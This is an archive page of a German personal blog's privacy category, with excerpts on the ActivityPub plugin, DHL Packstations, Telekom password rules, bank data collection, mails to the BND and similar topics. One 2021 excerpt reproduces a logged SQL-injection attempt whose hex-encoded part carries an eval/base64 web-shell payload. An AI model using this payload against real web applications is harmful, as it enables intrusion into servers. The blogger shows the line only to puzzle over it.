Archiv der Rubrik 'Datenschutz'
ClassicPress im Fediverse
Donnerstag, 30. März 2023
Es ist nur logisch, ClassicPress (wie auch WordPress) als dezentrale Blogging-Software mit dem dezentralen Fediverse zu verbinden. Also habe ich vor einiger Zeit das Plugin ActivityPub installiert. Nur: Mein Blog konnte und kann im Fediverse überwiegend nicht gefunden werden. Mastodon-Instanzen sehen es nicht. Hubzilla-Instanzen können es sehen, wie mir schon bestätigt wurde, aber das allein genügt ja nicht.
An dem Plugin gibt es zunächst etwas zu kritisieren. Vor vielen Jahren bereits hat sich bei WordPress die Erkenntnis durchgesetzt, daß es eine gute Idee sei, den Login-Namen und den Display-Namen der Blog-Autorenschaft zu trennen, weil damit die erste Hälfte der Login-Daten bereits offengelegt ist. ActivityPub publiziert die Beiträge nun unter @loginname@blog.name, und reißt damit diese Lücke wieder auf. Nun können Bots wieder versuchen, das Paßwort zum bekanntgegebenen Login-Namen zu erraten. Es wäre also angebracht, den Nutzenden die Möglichkeit zu geben, einen anderen als den Login-Namen anzugeben – oder einfach den Display-Namen (oder einen Teil davon, wenn zum Beispiel ein Leerzeichen enthalten ist) zu verwenden.
Ich verwende zwar WPS Hide Login und verstecke damit den Login, trotzdem habe ich zusätzlich direkt mal noch 2FA eingerichtet, damit da keine unerwünschten Dinge passieren.
Aber das ist leider nicht mein einziges Problem bei der Integration von ClassicPress ins Fediverse. (mehr …)
DHL-Packstation: Bald bequem unsicher
Donnerstag, 16. September 2021
Gerade erfahren: Pakete an der Packstation mit der Post & DHL App abholen.
Kurz: Die App soll auf Abruf einen 120 Sekunden gültigen QR-Code ausspucken, mit dem man das Paket aus der Station holen kann. Die Kundenkarte wird dann nicht mehr benötigt.
Etwas länger: Leute, das könnte in die Hose gehen … (mehr …)
Angriffsversuch per Referer
Sonntag, 2. Mai 2021
Eben in einer Meldung von fail2ban gesehen:
114.219.10.161 - - [02/May/2021:08:02:47 +0200] "POST /user.php HTTP/1.1" 404 47 "45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\x22num\x22;s:191:\x22*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7B24617364275D3B6576616C2F2A2A2F286261736536345F6465636F646528275A585A686243676B583142505531526259575274615735644B54733D2729293B2F2F7D787878,0--\x22;s:2:\x22id\x22;s:9:\x22' union/*\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Ohne Recherche: Das sieht erstmal … seltsam aus. Vermutlich müßte man die Hex-Zahlenreihen aufdröseln, um zu erfahren, was er wirklich wollte. Die lesbaren Strings „select“ und „union“ deuten aber auf einen SQL-Angriff hin. Nur: Warum steht der im Referer? Was würde denn darauf anspringen? (mehr …)
Essen „retten“ mit TooGoodToGo
Mittwoch, 15. April 2020
Auf Werbung reagiere ich ja üblicherweise überhaupt nicht, und wenn, dann meistens eher negativ. In einem Smartphone-Spiel mit Werbeeinblendungen sah ich im Januar jedoch etwas, was ich tatsächlich mal interessant fand: Da gibt es also eine Smartphone-App namens TooGoodToGo, mit deren Hilfe man Nahrungsmittel „retten“ könne, damit sie nicht weggeworfen werden. Das mußte ich dann doch mal ausprobieren.
Auf der Website heißt es, ein Drittel aller Lebensmittel werden verschwendet, werden also weggeworfen, obwohl sie noch genießbar sind. Stattdessen sollen Betriebe, die Lebensmittel übrig haben, diese über die App anbieten. Man reserviert sich da als Kunde meistens eine „magic bag“, eine Überraschungstüte, bezahlt sie vorab zum Beispiel mit PayPal, und holt sie zur vorgegebenen Zeit im entsprechenden Laden, Hotel oder in der Gaststätte ab. Das ist bei den Läden meistens in den letzten 15 bis 30 Minuten vor Geschäftsschluß. Der Preis der Tüten liegt zwischen 30 und 50 % unter dem Ladenverkaufspreis. So weit, so gut. (mehr …)
Die Telekom und die IT-Sicherheit
Samstag, 2. November 2019
Eigentlich wollte ich nur mal eben mein älteres Smartphone bzw. die darin befindliche SIM auf der Website der Telekom registrieren in der Hoffnung, dort vielleicht einstellen zu können, ob und wann meine ausgehende Nummer beim Empfänger eines Anrufs angezeigt werden soll. Derzeit wird sie nämlich nicht angezeigt, weil ich das vor vielen Jahren in einem Telekom-Laden in Mannheim mal so angegeben hatte. Am Gerät selbst kann ich das nicht einstellen, warum auch immer.
Also ging ich auf die Website und wollte mich registrieren. Als erstes sollte ich bei der Anrede zwingend zwischen „Frau“ und „Herr“ wählen. Fuck you, Telekom, nonbinary Menschen existieren. Dann kam die Wahl eines Paßworts, und ich fühlte mich ins Jahr 1998 oder so zurückversetzt: (mehr …)
Öffentlicher Dienst und IT
Dienstag, 29. Oktober 2019
Ich hab jetzt länger nix von mir hören, also, ähm, lesen lassen, weil's mir echt nicht gut ging. Aber grad hab ich was gelesen, da muß ich doch mal ein bißchen was drüber loswerden. Und zwar schreibt der Tagesspiegel: Experten warnten schon 2017: IT-Katastrophe am Berliner Kammergericht kam mit Ansage. Aua. Aua. AUA! Auhauerha!
Also erstmal: Die Software war gnadenlos veraltet. Ich meine, Windows 95!? Echt jetzt?
Mir scheint es außerdem, daß es (was mich aus meiner eigenen Erfahrung im öffentlichen Dienst jetzt so gar nicht wundern würde) keinerlei Schulungen des Personals zum Thema Datenschutz gab. Bei einem Gericht müßte da eigentlich jede Person, vom Richter bis zur Tippse, immer auf dem aktuellen Stand sein. Auch was IT-Sicherheit angeht, von Paßwörtern bis zum Transport von Daten; gerade, wenn auch zu Hause gearbeitet wird. (mehr …)
Western Union und der seltsame Mailserver
Samstag, 27. Juli 2019
Im Nachklapp zu der Gambia-Geschichte bleibt noch etwas, was ich mal separat aufschreibe, weil es damit vermutlich nicht direkt zusammenhängt. Kurz: Entweder hat Western Union einen kaputten Mailserver oder ist undicht.
Denn nur eine halbe Stunde nach der Anmeldung bei Western Union mit einer speziell dafür angelegten Mailadresse (so'n eigener Mailserver ist ja doch für was gut) versuchte ein Host über Tage hinweg, E-Mails an genau diese Adresse einzuliefern, scheiterte jedoch an meiner Konfiguration: (mehr …)
Account bei Patreon schließen
Donnerstag, 7. Februar 2019
Einen Account auf Patreon aufmachen ist einfach.
Ihn aber dann zu schließen, ist so Passierschein-A38-mäßig. Das sieht dann nämlich so aus:
Man geht auf die Einstellungen für den Account, wo ganz unten die Option zu finden ist, den Account zu schließen. Natürlich mit fetter Warnung, daß das dann dauerhaft und für immer ist und so. Wenn man da draufklickt, wird aber keineswegs einfach der Account geschlossen. Das wäre zu einfach. (mehr …)
Wie man ein Skype-Paßwort (nicht) recovert
Mittwoch, 7. März 2018
Heute Nachmittag saß ich vor einem schon recht betagten PC, einem Dell mit Pentium D, mit einem Windows XP. Die wichtigste Aufgabe an diesem PC: Das Skype-Paßwort des Nutzers herausfinden. Der Eigentümer des PCs hatte das Gerät mehrere Jahre lang nicht benutzt (ein relevanter Datei-Zeitstempel wies auf September 2015), hatte sein Paßwort vergessen und wollte es jetzt da rausgezogen haben, um Skype von einem anderen PC aus nutzen zu können. Sollte eigentlich zu machen sein, oder?
Tja, sollte. Die Praxis sah dann doch etwas anders aus … (mehr …)
Datensammlung getarnt als Wohltätigkeit
Freitag, 29. September 2017
Die Ing-Diba, eine Bank, veranstaltet derzeit einen Wettbewerb. Man soll dort für „seinen“ Verein stimmen, und der Verein, der am meisten Stimmen bekommt, bekommt von der Bank dann ein (für die Verhältnisse der Bank) kleines Taschengeld. Das klingt nach Wohltätigkeit, ist es aber nicht. Tatsächlich handelt es sich um eine für die Bank sehr billige Marketing- und Datensammel-Aktion. Das Ziel: bekannter werden und aktuelle Handy-Nummern einsammeln.
Denn wer dort für „seinen“ Verein abstimmen will, wird erstmal dazu aufgefordert, seine Handy-Nummer anzugeben, angeblich zu dem Zweck, mithilfe einer SMS sicherzustellen, daß jeder nur einmal abstimmen kann: (mehr …)
Arbeitsagentur sucht Verbesserungsvorschläge?
Dienstag, 10. Mai 2016
Die Bundesarbeitsagentur möchte Verbesserungsvorschläge sammeln, für sich und die ARGEn. Aber bitte nur von registrierten Menschen. Anonym geht das nicht.
Also, meine Interpretation: Die Arbeitsagentur möchte Daten sammeln, um eingereichte Vorschläge dann ignorieren zu können. Die Daten sind bestimmt nützlich, um herauszufinden, wen man denn als nächstes so sanktionieren oder wessen Antrag man direkt ablehnen könnte.
Wenn sie keine persönlichen Daten verlangen würden, könnte ich ihnen ja sagen, daß sie endlich Mailverschlüsselung einführen sollen. Außerdem könnte ich fragen, wie ich mich absichern kann, daß keine Mails verloren gegangen werden, wie das heute bei Papierpost schon gerne mal passiert und was, obwohl es ein Straftatbestand ist (Unterschlagung), von Staatsanwaltschaften einfach nicht verfolgt wird, weil ähm, ja, weil … Behörden machen ja niiiie Fehler, ne?
Oh, und eine echte Vebesserung wäre die Abschaffung von Sanktionen und Existenzvernichtungsversuchen zum Zwecke des „Sparens“ und der Statistikbeschönigung. Also, die Einhaltung des Grundgesetzes und der höchstrichterlichen Rechtsprechung des BVerfG. Aber ich glaube, das meinen die eh nicht …
Übermäßiges Mißtrauen? Nein. Erfahrung.
Nachtrag: Wer bezahlt den Erwerbslosen eigentlich die PCs und Scanner, um den Schriftverkehr tatsächlich sinnvoll online abwickeln zu können? Bisher sind PCs und Zubehör, also Anschaffung, Wartung, Verbrauchsmaterial usw., explizit nicht im Regelsatz enthalten.
Wer zuerst zum ARGE oder zur BA hinschlappen muß, um dort die PCs zu benutzen, kann die Unterlagen auch gleich persönlich abgeben. Mit Quittung. Solche Unterlagen in ein Internetcafé (falls es denn noch welche gibt) oder „zu Bekannten“ hinzuschaffen, um sie einscannen und hinschicken zu können, ist nicht gerade ein Optimum an Datenschutz – aber, ach so, der gilt für unsereins ja sowieso nicht.
Twitter-DMs verschlüsseln
Donnerstag, 13. August 2015
Twitter hat gerade bekanntgegeben, daß seit gestern bei den Accounts sukzessive die 140-Zeichen-Grenze bei DMs (Direktnachrichten) fallen soll. Mein erster Gedanke war ja: Oh, schön, dann erfahren sie noch mehr über ihre Nutzer. Aber dann wurde mir auch klar: Das Wegfallen der Grenze bringt gerade dahingehend einen Vorteil.
@AlexSchestag und ich probierten deshalb gestern Abend ein wenig herum, und voilà: Heraus kamen GnuPG-verschlüsselte DMs. Zugegeben, es ist ein wenig umständlich, aber es geht. (mehr …)
Freiheit statt Angst 2014
Montag, 1. September 2014
Nachdem das ARGE angedeutet hatte, daß sie mich jetzt doch wieder weiterexistieren lassen wollen (die Geschichte will ich diese Woche auch noch verbloggen), habe ich mich am Donnerstag Abend nach einem Kassensturz kurzfristig dazu entschieden, doch noch an der Demonstration „Freiheit statt Angst“ (FsA) in Berlin teilzunehmen. Eine günstige Fahrgelegenheit war nicht mehr zu bekommen. Die Fernbusse werden ja immer teurer, je näher ein Reisetermin rückt und je voller die Busse werden. Den Bus von #StopWatchingUs Köln wiederum wollte ich wegen der zu erwartenden Unruhe darin, und weil ich dafür am Samstag früh bereits um vier Uhr hätte in Köln sein müssen, nicht nutzen. Also fuhr ich eben mit der Bahn – und genehmigte mir eine Übernachtung in einem Hostel. (mehr …)
Eine Mail an den BND (2)
Dienstag, 24. Juni 2014
Auf meine Mail an den BND sowie die Bundesdatenschutzbeauftragte und den Herrn Binninger hat letzterer heute geantwortet – lobenswerterweise unter Einsatz meines Public Key, was ja nun nicht so selbstverständlich ist. Die Antwort ging wohl auch an weitere Menschen, die eine gleichartige E-Mail gesandt hatten; zumindest von Alex Schestag weiß ich, daß er eine wortgleiche Antwort bekommen hat.
Diese Antwort enthielt allerdings eine Behauptung, die ich so nicht stehenlassen konnte: (mehr …)
Eine Mail an den BND
Donnerstag, 19. Juni 2014
Genauso wie Holger Koepke habe ich soeben eine E-Mail an den BND geschrieben:
To: zentrale@bundesnachrichtendienst.de
CC: poststelle@bfdi.bund.de, clemens.binninger@bundestag.de
Subject: Überwachung meines InternetverkehrsSehr geehrte Damen und Herren, (mehr …)